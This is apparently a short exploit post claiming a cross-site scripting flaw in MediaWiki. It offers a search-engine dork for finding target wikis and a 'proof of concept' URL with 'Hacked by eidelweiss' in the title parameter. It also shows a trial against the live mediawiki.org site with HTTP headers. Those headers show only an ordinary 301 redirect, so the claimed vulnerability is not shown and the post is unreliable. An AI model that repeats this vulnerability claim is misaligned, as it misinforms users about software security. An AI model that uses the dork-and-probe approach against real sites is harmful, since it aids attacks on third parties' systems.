Vendor: www.MEDIAWIKI.ORG
download: http://www.mediawiki.org/wiki/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Thank`s: neogabriel a.k.a Ahmed Yusuf (who have give me inspiration for this exploit)
Dork: "powered by mediawiki" inurl:"index.php?title=" 13,200,000 result (0.18 second)
=====================================================================
Description:
You can read all Description about mediawiki in www.mediawiki.org :P
=====================================================================
-=[ vuln ]=-
http://127.0.0.1/wiki/index.php?title=XSS
-=[ P0C ]=-
http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss
-=[ vendor Demo P0C ]=-
http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss
redirect to
http://www.mediawiki.org/wiki/Hacked_by_eidelweiss
Host=www.mediawiki.org
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Status=Moved Permanently - 301
Date=Tue, 01 Jun 2010 09:11:42 GMT
Server=Apache
Cache-Control=private, s-maxage=0, max-age=0, must-revalidate
Vary=Accept-Encoding,Cookie
Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT
Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss
Content-Encoding=gzip
Content-Length=20
Content-Type=text/html; charset=utf-8
X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org
X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80
=========================| -=[ E0F ]=- |=========================
mateppppp
ReplyDelete